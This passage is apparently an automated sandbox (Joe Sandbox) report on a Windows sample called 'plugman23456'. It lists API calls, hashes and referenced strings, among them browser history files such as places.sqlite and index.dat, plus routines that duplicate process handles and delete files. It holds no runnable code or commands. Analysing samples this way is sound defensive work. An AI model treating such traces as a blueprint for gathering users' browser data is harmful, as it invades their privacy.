                          • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                          APIs
                          • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                          • LockResource.KERNEL32(00000000), ref: 004148EF
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Resource$FindLoadLockSizeof
                          • String ID:
                          • API String ID: 3473537107-0
                          • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                          • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                          • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                          • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                          • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                          • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                          • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                          APIs
                          Strings
                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset
                          • String ID: only a single result allowed for a SELECT that is part of an expression
                          • API String ID: 2221118986-1725073988
                          • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                          • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                          APIs
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00414C40,?,00000000), ref: 00414BA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                          • String ID: SHGetSpecialFolderPathW$shell32.dll
                          • API String ID: 2773794195-880857682
                          • Opcode ID: 97e3436b7678629204c95b3b1f0e86467fe5b848d0a0c87f8b2ef990139e8914
                          • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                          • Opcode Fuzzy Hash: 97e3436b7678629204c95b3b1f0e86467fe5b848d0a0c87f8b2ef990139e8914
                          • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@
                          • String ID:
                          • API String ID: 1033339047-0
                          • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                          • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                          • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                          • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                          APIs
                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000,00000065,?), ref: 004449E7
                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                          • memcmp.MSVCRT ref: 00444BA5
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$memcmp
                          • String ID: $$8
                          • API String ID: 2808797137-435121686
                          • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                          • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                          • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                          • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                          APIs
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • _mbscpy.MSVCRT ref: 00405250
                          • _mbscat.MSVCRT ref: 0040525B
                          • GetProcAddress.KERNEL32(0045DBE0,0045E298,00000060,00000000), ref: 00405266
                            • Part of subcall function 00405211: GetProcAddress.KERNEL32(0045DBE0,?,00405282,00000000), ref: 00405217
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                          • String ID:
                          • API String ID: 966727022-0
                          • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                          • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                          • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                          • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                          APIs
                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                            • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                            • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                            • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNELBASE(00000000), ref: 0040E135
                            • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                          • CloseHandle.KERNELBASE(000000FF), ref: 0040E582
                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                            • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                          • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                          • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                            • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$Handle$Close$ProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                          • String ID:
                          • API String ID: 2722907921-0
                          • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                          • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                          • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                          • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                          APIs
                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                          • memset.MSVCRT ref: 00403A55
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                          • String ID: history.dat$places.sqlite
                          • API String ID: 3093078384-467022611
                          • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                          • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                          • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                          • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                          APIs
                            • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                          • GetLastError.KERNEL32 ref: 00417627
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ErrorLast$File$PointerRead
                          • String ID:
                          • API String ID: 839530781-0
                          • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                          • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FileFindFirst
                          • String ID: *.*$index.dat
                          • API String ID: 1974802433-2863569691
                          • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                          • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@mallocmemcpy
                          • String ID:
                          • API String ID: 3831604043-0
                          • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                          • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                          • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                          • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                          APIs
                          • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                          • GetLastError.KERNEL32 ref: 004175A2
                          • GetLastError.KERNEL32 ref: 004175A8
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ErrorLast$FilePointer
                          • String ID:
                          • API String ID: 1156039329-0
                          • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                          • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                          • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                          • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                          APIs
                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000), ref: 0040A044
                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                          • CloseHandle.KERNEL32(00000000), ref: 0040A061
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$CloseCreateHandleTime
                          • String ID:
                          • API String ID: 3397143404-0
                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                          APIs
                          • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                          • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Temp$DirectoryFileNamePathWindows
                          • String ID:
                          • API String ID: 1125800050-0
                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CloseHandleSleep
                          • String ID: }A
                          • API String ID: 252777609-2138825249
                          • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                          • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                          • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                          • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset
                          • String ID: BINARY
                          • API String ID: 2221118986-907554435
                          • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                          • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                          • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                          • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _wcsicmp
                          • String ID: /stext
                          • API String ID: 2081463915-3817206916
                          • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                          • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                          • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                          • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                          APIs
                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                          • CloseHandle.KERNELBASE(00000000), ref: 0040957A
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$??2@CloseCreateHandleReadSize
                          • String ID:
                          • API String ID: 1023896661-0
                          • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                          • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                          • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                          • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                          APIs
                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                          • CloseHandle.KERNELBASE(?), ref: 0040CC98
                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                          • String ID:
                          • API String ID: 2445788494-0
                          • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                          • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                          • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                          • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                          APIs
                          Strings
                          • failed to allocate %u bytes of memory, xrefs: 004152F0
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: malloc
                          • String ID: failed to allocate %u bytes of memory
                          • API String ID: 2803490479-1168259600
                          • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                          • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                          • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                          • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                          • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                          • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                          • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcmpmemset
                          • String ID:
                          • API String ID: 1065087418-0
                          • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                          • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                          APIs
                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                          • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                          • CloseHandle.KERNEL32(?), ref: 00410654
                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                            • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                            • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                          • String ID:
                          • API String ID: 1381354015-0
                          • Opcode ID: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                          • Opcode Fuzzy Hash: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset
                          • String ID:
                          • API String ID: 2221118986-0
                          • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                          • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                          • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
